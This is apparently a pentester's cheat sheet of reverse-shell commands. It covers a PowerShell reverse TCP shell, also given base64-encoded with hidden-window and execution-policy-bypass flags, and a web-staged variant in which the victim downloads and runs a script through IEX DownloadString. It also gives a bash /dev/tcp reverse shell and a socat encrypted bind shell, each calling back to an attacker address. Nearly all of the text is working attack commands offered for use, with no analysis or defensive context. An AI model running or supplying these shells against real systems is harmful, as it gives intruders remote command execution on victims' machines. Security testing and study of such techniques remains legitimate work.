Manual

Windows

PowerShell Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443

# Generate PowerShell command to execute on target
export LHOST="4.3.2.1"
export LPORT="443"
echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo '
$c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT')
$s=$c.GetStream()
$sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ")
$s.Write($sb,0,$sb.Length)
[byte[]]$b=0..65535|%{0}
while(($i=$s.Read($b,0,$b.Length)) -ne 0){
 $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i)
 $sb=(iex $d | Out-String) 2>&1
 $sb2=$sb+"PS "+(pwd).Path+"> "
 $sb=([Text.Encoding]::UTF8).GetBytes($sb2)
 $s.Write($sb,0,$sb.Length)
 $s.Flush()
}
$c.Close()
' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n"

# Result Example
powershell -nop -noni -w Hidden -ep Bypass -e CgAkAGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAiADQALgAzAC4AMgAuADEAIgAsADQANAAzACkACgAkAHMAPQAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkACgAkAHMAYgA9ACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAUABTACAAIgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAiAD4AIAAiACkACgAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgBbAGIAeQB0AGUAWwBdAF0AJABiAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQAKAHcAaABpAGwAZQAoACgAJABpAD0AJABzAC4AUgBlAGEAZAAoACQAYgAsADAALAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7AAoAIAAkAGQAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAHQAIABUAGUAeAB0AC4AVQBUAEYAOABFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACQAaQApAAoAIAAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApACAAMgA+ACYAMQAKACAAJABzAGIAMgA9ACQAcwBiACsAIgBQAFMAIAAiACsAKABwAHcAZAApAC4AUABhAHQAaAArACIAPgAgACIACgAgACQAcwBiAD0AKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGIAMgApAAoAIAAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgAgACQAcwAuAEYAbAB1AHMAaAAoACkACgB9AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAAoA

PowerShell Reverse TCP (web stagged)

# Attacker Listen 443
sudo nc -nvlp 443

# Serving PS ReverseShell on http://*:80/rs.ps1
LHOST="4.3.2.1"
LPORT="443"
cd $(mktemp -d) && \
echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \
sudo python3 -m http.server --cgi 80

:: Victim, retrieve and launch rs.ps1
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1')

Linux

Bash Reverse TCP

# Attacker Listen 443
sudo nc -nvlp 443

# Victim Connect 443
bash -i >& /dev/tcp/4.3.2.1/443 0>&1

Socat Reverse TCP (encrypted)

Etablish an encrypted bind shell with socat and a certificate (pub+key)

# Victim - Regroup cert and key
cat server.key server.crt > server.pem

# Victim - Listen 443
sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash

# Attacker - Connect 443
socat - OPENSSL:10.11.0.4:443,verify=0   #Skip certificate check